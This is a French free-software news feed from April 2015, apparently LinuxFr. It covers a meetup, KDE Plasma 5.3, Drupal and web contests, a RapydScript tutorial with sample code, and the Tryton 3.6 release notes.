Bien entendu, cette consultation dépasse très largement le domaine de l'informatique. Cependant, nous avons aussi connu des processus de normalisation dans le domaine de l'informatique, notamment et surtout dès lors qu'il s'agit de question de formats de fichiers (cf OpenXML, ODF, PDF ….).

Vous remarquerez que l'intitulé du document fourni par l'Autorité pour cette consultation fait réfléchir… « Les activités de normalisation ou de certification pro- ou anti-concurrentielles ? »

Vous pouvez faire vos remarques jusqu'au 1er Juin 2015.

Télécharger ce contenu au format Epub

Lire les commentaires

Rencontre du Groupe OSM Montpellier (gosmm) le 29 avril 2015

Mercredi 29 Avril

Comme tous les derniers mercredi de chaque mois, les passionnés de cartographie d'Open Street Map se réuniront le 29 avril 2015 de 19h00 à 23h00.

Le rendez-vous est à :

  • Cowork’in Montpellier au 19, rue de l’école de droit à Montpellier
  • Tramway ligne 3, arrêt Plan Cabanes
  • GPS Latitude : 43.610769 | Longitude : 3.876716

Si vous avez des propositions n’hésitez pas à compléter la page dédiée.

Le programme de travail proposé est en deuxième partie…

Proposition de programme

Comme d’habitude, chacun amène ce qu’il veut à manger et à boire et on partage tout. N’oubliez pas vos ordinateurs portables pour la séance de saisie !

  • Cartographie humanitaire : suite et bilan de la contribution OSM pour l’épidémie ébola en Guinée.
  • Présentation d’une interface cartographique de téléchargement des données OSM en Languedoc-Roussillon.
  • Le point sur les saisies des établissements scolaires dans l’Hérault et démarrage de la saisie sur le Gard.
  • Discussions autour de Mapillary, un service de partage de photos géoréférencées
  • Comment sélectionner les données de plusieurs entités administratives et gérer les problèmes d’homonymie de lieu avec l’outil overpass-turbo
  • Suite et fin de la saisie-partie accessibilité PMR du quartier Clemenceau Montpellier
  • Contributions libres
Télécharger ce contenu au format Epub

Lire les commentaires

Plasma 5.3 : « Si tu veux m'essayer (…) c'est pas un problème » !

Mercredi 29 Avril

Le 28 avril, Plasma 5.3 sort et se peaufine grandement, et convainc quelques distributions de plus de l'inclure comme Fedora 22, ou Kubuntu 15.04 (en version 5.2 pour l'instant).

En route pour les nouveautés !

Gestion de l'énergie et de sa consommation

Il est maintenant possible de configurer les options de gestion d'énergie par activité. En outre, si une application bloque la gestion de l'énergie, cela bloquera également le verrouillage de la session. Mais les choses s'améliorent puisque le nom de l'application incriminée est indiqué au sein de la zone idoine de la barre des tâches.

Kinfocenter offre des statistiques sur la consommation énergétique par application, ce qui peut grandement aider ceux qui voient leur batterie se vider plus vite que d'habitude.
Enfin, un bogue gênant a été corrigé : lorsqu'un écran externe est connecté à un ordinateur portable, fermer l'écran ne met plus l'ordinateur en veille (mais ce comportement peut être changé).

Configurations

L'outil de configuration du pavé tactile est maintenant inclus à côté des autres modules de configuration du système.

Le bluetooth n'est pas en reste, puisqu'un nouvel applet fait son apparition, et que Bluedevil a été porté à BluezQt. Enfin, les appareils connectés en ObexFTP apparaissent correctement dans la barre de navigation du navigateur de fichiers.

Du côté des widgets

De nouveaux widgets se voient portés vers plasma 5 : comics et les plasmoïdes pour monitorer le système (tels que la charge CPU ou bien l'utilisation des disques). En outre, une nouvelle manière de déplacer les widgets est arrivé : la possibilité de les déplacer en glisser-déposer.

Le presse-papier gère maintenant l'affichage des codes-barres 1D et 2D (tels que les QRCodes).

Prévisualisation technologique du mode « centre multimédia »

Basé sur les activités de plasma, le nouveau Plasma Media Center offre la possibilité de démarrer directement une session dans ce mode. Pour, par exemple, afficher les informations multimédias sur une télévision. Ce n'est qu'un aperçu et il n'est pas complet (comparé à la première version), bien que considéré comme relativement stable.

Wayland

De gros efforts ont été faits, puisque plasma est maintenant capable de lancer un server XWayland imbriqué dans la session courante. Cette intégration n'est pas encore complète, mais pourrait l'être dans la prochaine 5.4.

Chasse aux bogues

Pas moins de 413 bogues se sont faits dégommer pour aboutir à cette nouvelle version.

La suite

La prochaine version devrait sortir fin août, d'ici-là n'hésitez pas à remonter tout ce qui doit être amélioré ou ce que vous souhaiteriez voir (comme un centre de notifications mieux fait, ou bien l'intégration des rendez-vous dans le calendrier, etc.).

Télécharger ce contenu au format Epub

Lire les commentaires

Lancement des Drupagora d'Or, concours visant à récompenser les meilleurs projets menés sous Drupal

Mercredi 29 Avril

Ce concours est organisé dans le cadre de Drupagora, le rendez-vous annuel de tout l’écosystème Drupal, qui se tient le 19 juin prochain à Paris.

Ce concours s’adresse à tout porteur d’un projet dans le domaine de Drupal :

  • les entreprises et institutions qui ont utilisé Drupal dans leurs projets informatiques ;
  • les prestataires informatiques qui ont participé à la mise en place d'un projet Drupal pour le compte d'un de leurs clients (ce sera l'organisation cliente qui sera récompensée et non le prestataire) ;
  • les personnes qui souhaitent faire connaître un projet innovant sous Drupal.

Chaque porteur de projet peut candidater dans une ou plusieurs catégories.

4 catégories sont proposées cette année :

  • un site de e-commerce développé avec Drupal ;
  • un site de contenu/média développé avec Drupal ;
  • un site institutionnel / grand compte / secteur public développé avec Drupal ;
  • un projet innovant réalisé avec Drupal.

Le grand prix du jury sera également décerné parmi les 4 lauréats.

Les dossiers seront étudiés par un jury présidé par Nicolas Silberman, co-organisateur de Drupagora et composé d’une dizaine de membres reconnus dans le domaine du logiciel libre, et notamment Drupal. Parmi eux, nous pouvons citer :

  • Greg Beuthin, membre de la Communauté Drupal et Drupal Commerce ;
  • Paul Chaine, Responsable du numérique Château de Versailles ;
  • Mathieu Gros, Directeur Général, Actency ;
  • Jean-François Naud, Responsable des projets Web & Mobile, Relais & Châteaux ;
  • Maxime Topolov, co-fondateur et Directeur Technique, Adyax.

Le dossier de candidature est disponible sur : http://www.drupagora.com/2015/les-drupagora-dor.

Chaque dossier de candidature devra être envoyé par mail à trophees chez drupagora point com avant le vendredi 22 mai 2015 minuit.

La remise des trophées aura lieu le vendredi 19 juin 2015 à l'issue de Drupagora, en présence de l’ensemble des participants du forum.

INFORMATIONS COMPLÉMENTAIRES

La remise des Drupagora d'Or aura lieu à l'issue de Drupagora, qui se tient à l'Université Pierre et Marie Curie, Paris 5ème, le vendredi 19 juin de 9h à 18h. La conférence se déroule sur une journée avec une programmation qui sera consultable sur le site : http://www.drupagora.com.

Tarifs Drupagora :

  • 40 euros jusqu'au 01/05/2015 ;
  • 75 euros jusqu'au 15/06/2015 ;
  • 100 euros en tarif normal.

L'inscription s'effectue sur le site de Drupagora : http://www.drupagora.com

Télécharger ce contenu au format Epub

Lire les commentaires

La 5e édition des Open du Web revient le 7 mai, à Paris, Bordeaux, Lille et Tunis

Mercredi 29 Avril

Le jeudi 7 mai aura lieu la 5e édition du concours-événement des passionnés du web : les Open du Web.

450 participants s'affronteront à travers 24 épreuves qui représentent 6 métiers du web :

  • développement (PHP) ;
  • intégration web (HTML, CSS et développement JavaScript) ;
  • administration système (Debian GNU/Linux) ;
  • SEO et SEM ;
  • community management ;
  • webdesign.

L'objectif est de démontrer son talent sur un ou plusieurs métiers en réussissant le plus grand nombre d'épreuves possible dans le temps imparti : 2 heures. Les meilleurs seront couverts de lots et bénéficieront d'une visibilité internationale pour booster leur ego carrière !

L'événement est placé sous le haut patronage d'Axelle Lemaire, Secrétaire d'État chargée du Numérique, et parrainé par Anne Hidalgo, Maire de Paris.

Grâce à aux écoles Epitech et ESPRIT (Tunis), l'événement se déroulera dans 3 villes en plus de Paris (simultanément) : Bordeaux, Lille et Tunis.

Seront également présents plusieurs recruteurs tels que Rue du Commerce, Ikoula, Eurelis, Eotim, Sintegra, etc.

Nouveauté de la 5e édition : le concours commence en ligne

Si vous lisez ce message avant le jeudi 30 avril, vous avez la possibilité de passer le concours en traitant la première épreuve en ligne. Cela vous permet de mettre de côté des points précieux qui seront comptabilisés le jour J pour le classement final.

Les valeurs des Open du Web

Les Open du Web ce n'est pas qu'un concours mais aussi un lieu où sont débattues et défendues des valeurs fondamentales :

  • valoriser et faire connaître les métiers du web ;
  • faire émerger les jeunes talents ;
  • ouvrir le champ des possibles aux personnes issues de tous les parcours ;
  • conserver la passion au cœur de nos vies professionnelles ;
  • soutenir le web ouvert.

Un cycle de conférences et tables rondes est proposé avant le concours afin de discuter de ces sujets essentiels.

Informations pratiques
  • Date : jeudi 7 mai ;
  • horaires : ouverture des portes et début des conférences à 15h, début du concours à 17h30 (pour Tunis, enlever 1 heure de décalage horaire) ;
  • Emplacements :
    • salle Olympe de Gouges, 15 rue Merlin (11e arrondissement), Paris ;
    • école Epitech au 89 Rue du Jardin public, Bordeaux ;
    • école Epitech au 9 Rue du Palais Rihour, Lille ;
    • école Esprit - Z.I. Chotrana II, 2083 Pôle Technologique, El Ghazala, TUNIS, Tunisie.

Inscriptions et informations : http://www.open-du-web.fr/

En utilisant le code ODW-0011-LINUXFR, il est possible de s'inscrire sans passer par la case carte bancaire (10 € d'économisés).

Télécharger ce contenu au format Epub

Lire les commentaires

RapydScript, le JavaScript qui se déguise en Python

Mercredi 29 Avril
en marbre ?

RapydScript est un langage qui se compile en JavaScript, avec une syntaxe et des fonctionnalités qui se veulent proches de Python. Pour ceux qui connaissent coffeeScript, RapydScript est pareil mais inspiré par la lisibilité de Python. Il ne s'agit pas d'une nouvelle tentative de faire tourner Python dans le navigateur, comme par exemple Pyjamas. RapydScript reste du JavaScript, il n'introduit aucune limitation ni surcoût. Il paraît juste plus propre et donne l'impression d'écrire du Python.

Ses quelques fonctionnalités :

  • comme CoffeeScript, RapydScript répare les incohérences et inconsistances de JavaScript ;
  • un système de classes similaire à Python ;
  • support des listes en compréhensions ;
  • des exceptions comme en Python ;
  • des modules, plus flexibles que les modules Python ;
  • des arguments optionnels pour les fonctions, comme en Python ;
  • des décorateurs (sans arguments) ;
  • un système d'héritage plus puissant que celui de Python et plus clair que celui de JavaScript ;
  • le support d'objets (dictionnaires) avec fonctions anonymes, comme en JavaScript ;
  • la possibilité d’appeler n'importe quelle fonction, méthode, code JavaScript ou appel au DOM de n'importe quel framework, sans syntaxe spéciale ;
  • le choix entre les méthodes et fonctions à la Python ou leurs équivalents JavaScript ;
  • RapydScript s'auto-compile, c'est à dire que le compilateur est lui-même écrit en RapydScript et compile en JavaScript.
Sommaire

Voici un court exemple qui utilise JQuery :

class Popup: def __init__(self, containterId): # pop-up class will give us absolute position, high z-index and center the container self.$popup = $('#' + containerId).addClass('pop-up').mouseout(def(): self.hide() # unlike 'this', 'self' will reference the object itself ) self._$darkbg = $('#dark-bg') # overlays background with a dim layer to draw focus to the pop-up def show(self): self._$darkbg.show() self.$popup.show() def hide(self): self._$darkbg.hide() self.$popup.hide() msg = Popup('my-popup') msg.show()

Notons toutefois quelques limitations :

  • le source mapping n'est pas implémenté, mais l'auteur compte le faire ;
  • pas shell (repl) non plus, mais l'auteur le souhaite également ;
  • RapydScript a quelques bugs connus.
Installation

Comme d'habitude avec les applications Node.js, on utilise npm :

npm install rapydscript -g

Bibliothèque standard

Il est assez facile de faire tourner un code Python existant dans le navigateur car RapydScript a ré-implenté quelques bibliothèques standard de Python. Par exemple si vous utilisez range, print, ou list.append, il vous suffit d'importer la stdlib.js de rapydscript. Soit par un import explicite dans votre HTML, soit par la ligne import stlib dans votre code .pyj.

Il existe aussi le module math, re, unittest, random et yql.

Mais si vous écrivez du nouveau code, il est conseillé de se baser sur les bibliothèques JavaScript existantes, plus fournies.

Examples Appel à JavaScript

Si jamais vous devez appeler directement du JavaScript à cause d'une limitation de RapydScript, vous pouvez le faire avec la fonction JS :

JS('module').exports # meilleur équivalent à JS('module.exports')

Définir des fonctions

Une fonction tout à fait classique en RapydScript :

#regular def fibonacci(n): if n == 0: return 0 elif n == 1: return 1 else: return fibinacci(n-1) + fibinacci(n-2) a = fibinacci(8)

L'équivalent en JavaScript :

function fibonacci(n) { if (n === 0) { return 0; } else if (n === 1) { return 1; } else { return fibinacci(n - 1) + fibinacci(n - 2); } } a = fibonacci(8);

Utiliser des fonctions anonymes :

# anonymous math = { add: def(a, b): return a+b;, sub: def(a, b): return a-b;, mul: def(a, b): return a*b;, div: def(a, b): return a/b;, roots: def(a, b, c): r = Math.sqrt(b*b - 4*a*c) d = 2*a return (-b + r)/d, (-b - r)/d }

Des arguments optionnels comme en Python :

# with optional arguments def get(item, quantity=1): return [item for i in range(quantity)] a = get('hammer') b = get('nail', 3)

Ce qui produit le JavaScript suivant :

function get(item, quantity) { if (typeof quantity === "undefined") quantity = 1; return (function() { var _$rapyd$_Iter = range(quantity), _$rapyd$_Result = [], i; for (var _$rapyd$_Index = 0; _$rapyd$_Index < _$rapyd$_Iter.length; _$rapyd$_Index++) { i = _$rapyd$_Iter[_$rapyd$_Index]; _$rapyd$_Result.push(item); } return _$rapyd$_Result; })(); } a = get("hammer"); b = get("nail", 3); // les deux fonctions utilitaires créées: function range(start, stop, step) { if (arguments.length <= 1) { stop = start || 0; start = 0; } step = arguments[2] || 1; var length = Math.max (Math.ceil ((stop - start) / step) , 0); var idx = 0; var range = new Array(length); while (idx < length) { range[idx++] = start; start += step; } return range; } function _$rapyd$_print() { var args, output; args = [].slice.call(arguments, 0); output = JSON.stringify(args); if ("console" in window) console.log(output.substr(1, output.length-2)); }

L'usage de décorateurs (sans arguments) :

# and finally, decorated def makebold(fn): return def(): return "<b>" + fn() + "</b>" def makeitalic(fn): return def(): return "<i>" + fn() + "</i>" @makebold @makeitalic def hello(): return "hello world" Example: écrire une chaîne de callbacks

On fait souvent appel à une suite de callbacks en JavaScript. C'est tout à fait facile en RapydScript :

params = { width: 50, height: 30, onclick: def(event): alert("you clicked me"), onmouseover: def(event): $(this).css('background', 'red') , onmouseout: def(event): # reset the background $(this).css('background', '') }

Pour plus de détails, voyez "chaining blocks" dans la documentation.

Autres outils

RapydScript est assez jeune et n'a pas autant d'outils que, par exemple, CoffeeScript, mais on commence à voir des extensions pour Django ou d'autres outils Node, comme Gulp ou Grunt, ce qui permet de l'intégrer facilement à son projet AngularJS ou autre.

un dé-compileur JavaScript->RapydScript :

https://github.com/charleslaw/RapydScript-Decompiler

RapydFiddle pour partager du code en ligne

http://rapydscript.pyjeon.com/ (cliquer sur "démo")

gulp

https://github.com/vindarel/gulp-rapyd (utilisable mais pas fini)

grunt

https://github.com/loolmeh/grunt-rapydscript

extension pour Django

https://github.com/pztrick/DjScript

adaptation à Django-pipeline

https://github.com/traverseda/django-pipeline-rapydscript

mode emacs

https://gitlab.com/emacs-stuff/rapyd-mode

vim

https://github.com/atsepkov/vim-rapydscript (la configuration de l'auteur)

atom

https://atom.io/packages/language-rapydscript

Conclusion

Nous n'avons pas expliqué tout le fonctionnement de RapydScript, pour cela il y a la bonne documentation. Nous espérons vous avoir fait miroiter de nouveau ce vieux rêve: écrire une application web dans un seul langage, en Python.

Télécharger ce contenu au format Epub

Lire les commentaires

Sortie de tryton 3.6

Mercredi 29 Avril

Après 6 mois de développement, la version 3.6 de Tryton, la plate‐forme de développement d’applications pour entreprise (progiciel de gestion intégré ou PGI dit aussi ERP), est sortie.

Cette version apporte, en plus des habituelles corrections de bogues, le support officiel de PyPy une implémentation alternative de Python concentrée sur la vitesse et l'efficacité.

La migration depuis les versions précédentes est supportée.

Sommaire Détails des nouveautés Pour l'utilisateur

Un nouveau schéma de génération de couleur pour les graphes est introduit. Il remplace le précédent basé uniquement sur la luminosité en ajoutant un décalage supplémentaire de teinte d'un angle d'or afin de se prémunir de toute collision.

Le widget des champs dictionnaire (clés-valeur) voit maintenant l'auto-complétion activée sur la recherche de clés comme les autres widgets.

Les widgets des champs date, date-heure et heure ont été complétement réécrits, afin d'être plus flexibles sur le format d'entrée et de permettre une utilisation plus aisée avec une souris.

Les colonnes d'une vue liste qui sont garanties d'avoir toujours la même valeur (via un domaine) sont cachées automatiquement.

Pour le développeur

Il est maintenant possible d'afficher plusieurs fois le même champs comme colonne d'une vue liste.

Un nouveau type de champ TimeDelta fait son apparition. Il permet de représenter une durée. Il remplace le widget float_time hérité d'OpenERP (Odoo) qui comportait plusieurs problèmes dont entre autres un problème d’arrondi.

La syntaxe des méthodes on_change a été changée en faveur d'une version considérée plus consistante avec l'Active record (patron de conception). Au lieu de retourner un dictionnaire contenant les valeurs des champs à changer, l'instance est directement modifiée.

La méthode save est maintenant duale, c'est-à-dire qu'elle peut être appelée depuis une instance ou bien depuis la classe avec une liste d'instances comme paramètre. Ceci afin de tirer avantage de l'écriture et de la validation groupée de l'ORM de Tryton.

La clause de tri de la méthode de recherche permet maintenant d'utiliser une annotation avec des points. Celle-ci générera automatiquement les jointures nécessaires.

L'API des rapports a été retravaillée afin de simplifier l’intégration d'autres moteurs. Les méthodes de formatages sont maintenant plus strictes afin d'éviter les erreurs silencieuses.

La méthode safe_eval (dont on n'était pas sûr qu'elle soit si safe que ça) a été enlevée. Partout où du code Python devait être évalué de manière sûre, un autre format sûr a été utilisé comme du JSON.

Un nouveau type de bouton fait son entrée. C'est un bouton qui travaille sur une instance non-sauvée et qui la modifie de la même manière qu'un on_change côté client.

Modules Produits

Les listes de prix peuvent être définies aussi avec taxes comprises. Le prix hors-taxe sera calculé lors de la vente en se basant sur les taxes applicables.

Le nombre de décimales pour les calculs de prix en interne est maintenant un paramètre de configuration ce qui permet d'assurer la cohérence dans toute l'application.

Ventes

Les opportunités de ventes ont été fortement retravaillées. Il est maintenant possible de les faire aboutir à plusieurs ventes et leurs montants sont mis à jour en fonction de la réalisation des ventes.

Le calcul du coût de livraison se fait maintenant seulement au passage en devis (au lieu d'être calculé en direct) afin de réduire la charge sur le serveur.

Un nouveau module sale_extra permet d'ajouter une ligne de vente en extra en fonction de critères spécifiques. Cet extra peut-être gratuit ou bien un coût de service supplémentaire.

Stock

La création des requêtes d'achats avertit s'il y a des productions en retard afin de ne pas acheter inutilement des produits manquants.

Un nouveau module stock_lot_sled ajoute le support des dates d'expirations sur les lots. Quand un lot est expiré, il n'est plus pris en compte dans le calcul prévisionnel des quantités en stock.

Un nouvel état a été ajouté aux mouvements de stock staging. Il permet de créer des mouvements à l'avance sans impacter le prévisionnel.

L'assignation (réservation) des mouvements a été améliorée afin de ne plus tenir compte des mouvements déjà assignés entrants mais toujours de ceux sortants. La version précédente était légèrement trop optimiste sur la réalisation future des mouvements et ça pouvait poser quelques problèmes de gestion.

Commission

Ce nouveau sujet commence à être couvert par un ensemble de nouveaux modules. Un agent de commission peut être défini sur la vente ou la facture, celui-ci sera rétribué en fonction d'un plan de commissionnement. Il est aussi possible de définir sur un produit, un principal de qui recevoir la commission.

Comptabilité

Le wizard d'annulation de mouvement prend maintenant une description.

Les taxes peuvent être configurées pour modifier le montant de base pour les taxes suivantes à appliquer.

Il est possible de définir des modèles de mouvement comptable basés sur quelques paramètres déterminés. Ensuite exécuter un modèle va demander à l'utilisateur une valeur pour chacun de ces paramètres et générer le mouvement correspondant. C'est très pratique quand on a souvent les mêmes mouvements à encoder.

Le plan comptable français a été revu et amélioré, et le plan comptable belge traduit en néerlandais.

Un wizard permet maintenant de tester le résultat du calcul des conditions de paiement. Comme cet objet a fortement évolué ces derniers temps, il devenait impératif pour l'utilisateur de pouvoir tester la configuration qu'il venait d'encoder au lieu de devoir attendre la première facture.

La couverture SEPA s'étend encore un peu plus avec l'inclusion des messages pain.001.003.03 et pain.008.003.02 qui sont utilisés en Allemagne et de la version CFONB pour la France. Il est également possible de régénérer un message s'il était mal configuré la première fois.

Les lignes de relevé créent des mouvements comptables groupés par numéro, date et tiers. Cela permet de comprendre plus facilement l'historique comptable.

Un nouveau type de compte depôt est ajouté par le module account_deposit. Il permet de gérer des dépôts clients et de rappeler ces dépôts plus tard sur la facture suivante.

La suite Client web

Une campagne de financement a été réalisée au début de l'année afin de fournir une version complète du client web (sao).

Donc le développement a repris à un certain rythme se basant maintenant sur jQuery et Bootstrap. La demo de la version en cours de développement est disponible sur http://demo.tryton.org/ (demo / demo pour se connecter).

Python3

Le travail de fond pour le support de Python3 est maintenant bien avancé (https://bugs.tryton.org/issue3211). Il est fort probable qu'il sera présent dans la prochaine version dans 6 mois.

GTK-3

Le passage a GTK-3 prend par contre lui plus de temps par manque de moyens.

Télécharger ce contenu au format Epub

Lire les commentaires

Pages